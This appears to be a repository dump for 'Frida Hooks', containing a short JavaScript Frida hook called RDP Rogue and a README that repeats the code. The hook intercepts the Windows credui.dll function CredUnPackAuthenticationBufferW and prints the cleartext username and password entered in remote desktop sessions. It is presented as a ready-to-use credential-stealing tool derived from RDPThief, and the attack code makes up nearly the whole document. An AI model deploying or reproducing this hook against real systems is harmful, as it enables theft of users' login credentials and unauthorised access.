├── RDP_Rogue
    ├── poc.png
    ├── rdprogue.js
    └── README.md
└── README.md


/RDP_Rogue/poc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Agent00049/Frida-Hooks/master/RDP_Rogue/poc.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Frida Hooks
2 | 
3 | - RDP Rogue:  A Frida hook to retrieve RDP credentials based on [@FuzzySec](https://twitter.com/FuzzySec) [RemoteViewing](https://github.com/FuzzySecurity/Sharp-Suite#remoteviewing) project
4 | 
5 | 


--------------------------------------------------------------------------------
/RDP_Rogue/rdprogue.js:
--------------------------------------------------------------------------------
 1 | console.log('works!');
 2 | const CredUnPackAuthentication = Module.getExportByName('credui.dll','CredUnPackAuthenticationBufferW');
 3 | 
 4 | Interceptor.attach(CredUnPackAuthentication,{
 5 | 	onEnter: function (args){
 6 | 		console.log('Getting username and password pointers');
 7 | 		this.ptr_user=args[3];
 8 | 		this.ptr_pass=args[7];
 9 | 		
10 | 	},
11 | 	onLeave: function (retval) {
12 | 		console.log('Post-Call Values');
13 | 		console.log(Memory.readUtf16String(this.ptr_user)+':'+Memory.readUtf16String(this.ptr_pass));
14 |   }
15 | });
16 | 


--------------------------------------------------------------------------------
/RDP_Rogue/README.md:
--------------------------------------------------------------------------------
 1 | # RDP Rogue
 2 | 
 3 | Dirty Frida Hook to retrieve RDP credentials based on  [FuzzySec's](https://twitter.com/FuzzySec) [RemoteViewing](https://github.com/FuzzySecurity/Sharp-Suite#remoteviewing) and [@0x09AL](https://twitter.com/0x09AL) [RDP Thief](https://www.mdsec.co.uk/2019/11/rdpthief-extracting-clear-text-credentials-from-remote-desktop-clients/) projects
 4 | 
 5 | ```js
 6 | console.log('works!');
 7 | const CredUnPackAuthentication = Module.getExportByName('credui.dll','CredUnPackAuthenticationBufferW');
 8 | 
 9 | Interceptor.attach(CredUnPackAuthentication,{
10 | 	onEnter: function (args){
11 | 		console.log('Getting username and password pointers');
12 | 		this.ptr_user=args[3];
13 | 		this.ptr_pass=args[7];
14 | 		
15 | 	},
16 | 	onLeave: function (retval) {
17 | 		console.log('Post-Call Values');
18 | 		console.log(Memory.readUtf16String(this.ptr_user)+':'+Memory.readUtf16String(this.ptr_pass));
19 |   }
20 | });
21 | ```
22 | 
23 | ![](./poc.png)
24 | 
25 | ### References
26 | 
27 | [RDP Thief](https://www.mdsec.co.uk/2019/11/rdpthief-extracting-clear-text-credentials-from-remote-desktop-clients/)
28 | 
29 | [RemoteViewing](https://github.com/FuzzySecurity/Sharp-Suite#remoteviewing)


--------------------------------------------------------------------------------